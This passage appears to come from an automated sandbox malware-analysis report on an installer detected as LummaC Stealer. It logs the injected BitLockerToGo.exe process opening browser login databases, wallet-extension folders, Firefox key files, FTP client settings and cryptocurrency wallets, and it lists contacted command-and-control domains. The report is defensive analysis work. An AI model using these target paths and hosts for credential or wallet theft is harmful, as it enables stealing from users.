Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior

Source: Yara match	File source: 00000003.00000003.2381638051.0000000002F75000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2396721217.0000000002F75000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 6204, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 6204, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	312 Process Injection	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	221 Security Software Discovery	Remote Services	11 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	312 Process Injection	11 Input Capture	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Installer_x64.exe	13%	ReversingLabs
Installer_x64.exe	100%	Avira	TR/Crypt.XPACK.Gen

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:5778/sampling	0%	Avira URL Cloud	safe
https://impossiblekdo.click:443/api	0%	Avira URL Cloud	safe
https://impossiblekdo.click/apid	0%	Avira URL Cloud	safe
https://impossiblekdo.click/api$V	0%	Avira URL Cloud	safe
https://impossiblekdo.click/H	0%	Avira URL Cloud	safe
http://127.0.0.1:%d/samplinginconsis	0%	Avira URL Cloud	safe
impossiblekdo.click	0%	Avira URL Cloud	safe
https://impossiblekdo.click/api	0%	Avira URL Cloud	safe
https://impossiblekdo.click/s	0%	Avira URL Cloud	safe
https://impossiblekdo.click/	0%	Avira URL Cloud	safe
https://impossiblekdo.click/E	0%	Avira URL Cloud	safe
http://127.0.0.1:%d/samplinginconsistent	0%	Avira URL Cloud	safe
http://127.0.0.1:5778/sampling09AZ__az	0%	Avira URL Cloud	safe
https://impossiblekdo.click/pi	0%	Avira URL Cloud	safe
https://impossiblekdo.click/..	0%	Avira URL Cloud	safe
https://impossiblekdo.click/apiF	0%	Avira URL Cloud	safe
https://impossiblekdo.click/ks	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
impossiblekdo.click	188.114.97.3	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
impossiblekdo.click	true	Avira URL Cloud: safe	unknown
https://impossiblekdo.click/api	true	Avira URL Cloud: safe	unknown
rabidcowse.shop	false		high
wholersorie.shop	false		high
cloudewahsj.shop	false		high
noisycuttej.shop	false		high
nearycrepso.shop	false		high
framekgirus.shop	false		high
tirepublicerj.shop	false		high
abruptyopsn.shop	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	BitLockerToGo.exe, 00000003.00000003.2359366893.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359440172.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359308789.00000000054DB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	BitLockerToGo.exe, 00000003.00000003.2359366893.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359440172.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359308789.00000000054DB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/bjoerge/quickreload/blob/master/client.js	Installer_x64.exe	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	BitLockerToGo.exe, 00000003.00000003.2383484499.0000000002FFD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	BitLockerToGo.exe, 00000003.00000003.2383484499.0000000002FFD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://impossiblekdo.click/apid	BitLockerToGo.exe, 00000003.00000003.2381585077.0000000002FE5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	BitLockerToGo.exe, 00000003.00000003.2359366893.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359440172.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359308789.00000000054DB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://impossiblekdo.click/api$V	BitLockerToGo.exe, 00000003.00000003.2410777871.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2415123560.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2420712545.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2448860817.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2453829098.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2415772893.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://impossiblekdo.click:443/api	BitLockerToGo.exe, 00000003.00000003.2410777871.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2401202101.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2415123560.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2420712545.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2448860817.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2453829098.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2415772893.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2400793234.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2396721217.0000000002F75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:%d/samplinginconsis	Installer_x64.exe	false	Avira URL Cloud: safe	unknown
https://impossiblekdo.click/	BitLockerToGo.exe, 00000003.00000003.2401202101.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2453636157.0000000002F31000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2381558219.0000000002FFA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2454276330.00000000054A0000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2381625476.0000000002FFD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2400793234.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2396721217.0000000002F75000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2370650545.00000000054A6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:5778/sampling	Installer_x64.exe, 00000000.00000002.2335092399.000000000B812000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	BitLockerToGo.exe, 00000003.00000003.2382198320.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	BitLockerToGo.exe, 00000003.00000003.2382198320.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	BitLockerToGo.exe, 00000003.00000003.2359366893.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359440172.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359308789.00000000054DB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	BitLockerToGo.exe, 00000003.00000003.2383212818.00000000055CD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://impossiblekdo.click/s	BitLockerToGo.exe, 00000003.00000002.2454276330.00000000054A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	BitLockerToGo.exe, 00000003.00000003.2359366893.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359440172.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359308789.00000000054DB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://impossiblekdo.click/H	BitLockerToGo.exe, 00000003.00000002.2453829098.0000000002FC2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://impossiblekdo.click/E	BitLockerToGo.exe, 00000003.00000002.2454276330.00000000054A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://impossiblekdo.click/..	BitLockerToGo.exe, 00000003.00000003.2410777871.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	BitLockerToGo.exe, 00000003.00000003.2359366893.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359440172.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359308789.00000000054DB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	BitLockerToGo.exe, 00000003.00000003.2382198320.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	BitLockerToGo.exe, 00000003.00000003.2382198320.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://stackoverflow.com/questions/19345392/why-arent-my-parameters-getting-passed-through-to-a-disp	Installer_x64.exe	false		high
https://www.ecosia.org/newtab/	BitLockerToGo.exe, 00000003.00000003.2359366893.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359440172.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359308789.00000000054DB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	BitLockerToGo.exe, 00000003.00000003.2383484499.0000000002FFD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	BitLockerToGo.exe, 00000003.00000003.2383212818.00000000055CD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://127.0.0.1:%d/samplinginconsistent	Installer_x64.exe	false	Avira URL Cloud: safe	unknown
